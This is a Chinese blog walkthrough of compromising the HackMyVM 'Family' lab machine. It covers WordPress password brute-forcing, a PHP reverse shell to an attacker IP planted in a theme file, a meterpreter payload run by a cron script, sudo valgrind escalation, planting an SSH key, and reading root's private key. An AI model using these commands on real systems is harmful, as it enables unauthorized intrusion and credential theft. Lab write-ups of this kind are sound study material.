freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

hackmyvm——Family
2025-01-07 18:55:11
所属地 安徽省

信息收集

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

主机扫描

arp-scan -l

1736246599_677d0547ed3c49ed76ec5.png!small?1736246604344

端口扫描

nmap -A -p- -T4 172.20.10.4

1736246610_677d055228317aa0b69f1.png!small?1736246614550

发现只开放了22和80端口

访问主页以及指纹识别

1736246623_677d055fdf1a4b78196f8.png!small?1736246628602

发现页面很不对劲我们查看页面源码试试

1736246633_677d0569846d796ef477f.png!small?1736246637823

这里可能是让我们做本地的域名解析吧,我们直接修改/etc/hosts vim /etc/hosts

1736246645_677d0575c413b05aa654e.png!small?1736246650066

然后再去访问网站

同时我们的指纹探测也好了

1736246655_677d057fc3a8d463cf1c9.png!small?1736246660421

虽然没看出是什么尴尬了

1736246669_677d058d2808f0051c18f.png!small?1736246673731

漏洞探测

页面确实是不一样了,看这个目录wordpress此地无银三百两的感觉我们使用wpscan来爆破用户名

wpscan --url http://172.20.10.4/wordpress/ -e u

1736246682_677d059ac01c524be30ef.png!small?1736246687107

成功爆破出admin这个用户名然后我们使用wpscan来爆破后台账号admin的密码

这里我们使用kail自带的rockyou.txt字典,然后我们创建一个admin.txt 里面放入我们的admin

wpscan --url http://172.20.10.4/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin.txt

1736246693_677d05a522cb0b9bf1c70.png!small?1736246697501

成功爆破出密码 admin:phantom

漏洞利用

我们登录后台去寻找漏洞点

1736246719_677d05bfdc9b18b5f0f30.png!small?1736246724265

我们点到这里我们我发现覆盖文件内容了我们先使用phpinfo来检测一下

然后我们点击左下角的保存然后我们尝试拼接路径,wordpress的模板路径在wp-content/themes/看文件的位置是在哪我右上画的那个红框然后加上文件名,

最终拼接的路径是http://172.20.10.4/wordpress/wp-content/themes/twentytwentyone/search.php

尝试访问

1736246734_677d05ce9930112ef3483.png!small?1736246739724

解析成功这里我们有几种拿shell的方法直接exec执行弹shell或者是msf生成shell然后访问都可以我这里使用第一种方法

将文件的内容改成

<?php exec("bash -c 'bash -i &>/dev/tcp/172.20.10.2/8888 0>&1'"); ?>

然后本地nc监听

nc -lvp 8888

1736246747_677d05dbbe6c5d8d7c8e0.png!small?1736246751977

访问shell文件

1736246756_677d05e419d83fa6c2054.png!small?1736246760614

成功弹入shell

进去之后还是信息收集 ip a查看网络信息

1736246766_677d05eed5ecdd510eeb6.png!small?1736246771236

id

1736246773_677d05f5b7864718695ad.png!small?1736246778247

可以看到我们的权限很低,我们这里就要想着如何提取了,先看看有没有sudo提取

sudo -l

1736246782_677d05fe53afec0d663de.png!small?1736246786801

我们是没有sudo权限的我们再看看suid有没有可以利用的

1736246828_677d062c6a607c479fe2e.png!small?1736246832631

也是没有相对应的权限,看看网站的敏感文件吧config那种进入var/www/html/wordpress/目录下

1736246807_677d0617a2d7d2a2d015e.png!small?1736246812213

我们查看wp-config.php 这个是wordpress的配置文件里面会有连接数据之类的配置

cat wp-config.php

1736246851_677d0643e7394a0ae0ce1.png!small

但是这里好像没有我们想要的信息

我们去/home目录下看看吧信息收集要细致

cd /home

检查home,发现有3个用户

1736246904_677d06788b1711ef6e524.png!small?1736246909019

继续寻找一些有用的资源,发现了疑似密码我们尝试登录一下

1736246914_677d0682182f993a5ef76.png!small?1736246918346

最后我们登录father的时候成功

su father

1736246925_677d068dddae120810381.png!small?1736246930779

我们使用python建立交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

提取

我们继续尝试提权

sudo提权

1736246945_677d06a10af06e423b740.png!small?1736246949365

没有权限我们看看suid

1736246952_677d06a8d017ed4a83deb.png!small?1736246957470

那这个感觉就像是定时任务提权了我们这里下载一个工具他可以没有root权限就可以查看定时任务

pspy64Release No more waiting on drain · DominicBreuker/pspy

我们使用python本地开启一个web服务

python3 -m http.server 12345

1736246964_677d06b403543a340f2d1.png!small?1736246968300

然后靶机上wget下来

1736246972_677d06bc9bfb95a2014b6.png!small?1736246977293

我们赋予文件执行权限

chmod 777 pspy64

1736246978_677d06c2d80f5733f07c7.png!small?1736246983064

我们./pspy64运行

观察发现有定时脚本

1736246987_677d06cb1d0c4c9308bae.png!small?1736246991866

1736247000_677d06d89e6198018305a.png!small

这里我们要说一下就是这个~/check.py是在家目录下然后是id喂1001的用户我们

cat /etc/passwd看一下

1736247011_677d06e3227dc3b7a02d5.png!small

mother是uid1001

那么意思就很明显了就是让我们在mother目录下创建一个check.py的文件然后定时执行

msf生成木马

msfvenom -p python/meterpreter/reverse_tcp lhost=172.20.10.2 lport=5566

1736247027_677d06f3705304ba88a26.png!small?1736247031934

监听

1736247034_677d06fad245c664bb6f6.png!small?1736247039538

反弹到shell

这个时候我们使用python建立交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l看看有没有能提取的

1736247046_677d0706c9d462f41f148.png!small?1736247051103

发现存在valgrind但是他是属于他baby的baby用户可以不需要密码就可以执行

这里我们使用一个查询提权的网站GTFOBins

我们查一下

1736247058_677d071202baba56d1574.png!small?1736247062302

如果mother用户能通过sudobaby用户身份运行valgrind,有时攻击者可以利用这个权限来执行

sudo -u baby valgrind /bin/sh

1736247072_677d0720e4d26c63c9563.png!small?1736247077398

这个时候我们就拿到了baby的shell

这里有个小技巧就是实战攻防演练-Linux写入ssh密钥,利用密钥登录 - Super403 - 博客园

首先我们读取我们本地的ssh连接公钥

1736247090_677d073284b7e23a00b13.png!small?1736247095033

然后我们再baby目录下的.ssh目录下创建

authorized_keys 内容是我们的本地kail的公钥内容给复制进去

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDIO7luB//Dl4/+50sVL6/CrDOULhTcCAAdZ+P34ygrUkmw+efOM+xeObslX//n4+9M9VEj5pbml21vYzIrjNC2jYRuKA/2EGk7qoAodJmiX+dafFu75sHK2Tdvt72Abg2NfLldaGYtl8qrOIRvyablMXYtS2eWhRbtPbEvoioA5C43sgEjOe/zlzdbUJGthAAh/MN2gL3YRVcug2Kg1NtrKpUZMrWcvP7F5qbhQSDJuMPYjCBFMJ+Y/nCpz5MK6md0jShNKHOGtCk4sAYTpEyi3GV/mpDAKKy19MmQ2uHVyVCrBy95BrHXtcFYobcg+qdQTfJG4NHbyGky4tOOyyt4HiX1pnIcXZ5oChqgsqNwjSraogTTG22P5lEVbmcUiAgNs/FwmF5xkte+3PFU/StTm8uBYKY54U/I4++T0It/Z8QqrBuebjqKfA6hltyG9XnYdkZifZlLguWo/KfAh3JGwg9NBw7oFltwIbRYBm9xNSV+ySDWKpLVNS9hWgK33Kjk1kk44lqGz1AsCr3DQjlFMqrEMVAZgBS6E5A+bJGwuH/t7i8pMwJpZiLIMg7zBwkX+vbfUl4qKiUHGEp1rXqpyxy+biYWd9xr7U86Xw/nQWNIbZvQCVQg5a2chdgl2xvhMNHziz5UW/k8Z/kWzYYYHRCGNAFRshRbb7RrJSzcQw== root@kali'>authorized_keys

这里我们简单介绍一下 authorized_keys

authorized_keys文件是一个用于存储被允许通过 SSH 公钥认证登录的公钥的文件。它通常位于远程服务器的用户主目录下的.ssh目录中。该文件的作用是允许拥有匹配公钥的客户端用户通过 SSH 连接到服务器,而无需提供密码

然后我们ssh连接baby

1736247101_677d073d2b1a93fe511ae.png!small?1736247105643

我们sudo -l

1736247108_677d07446be657637451c.png!small?1736247112628

不需要密码就可以执行cat

这里的意思很明显了就是让我们使用cat去读取一下ssh的私钥

sudo cat /root/.ssh/id_rsa

1736247117_677d074d7cd70d79bc413.png!small?1736247123038

然后vi id_rsa将刚才的信息复制进去,然后我们进行ssh登录ssh root@127.0.0.1 -i id_rsa

这里要注意一下你的窗口不能太大了不然就会直接退出

然后我们输入感叹号!/bash

我们就成功拿到root的shell了


# 渗透 # 内网渗透 # 靶场实战
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录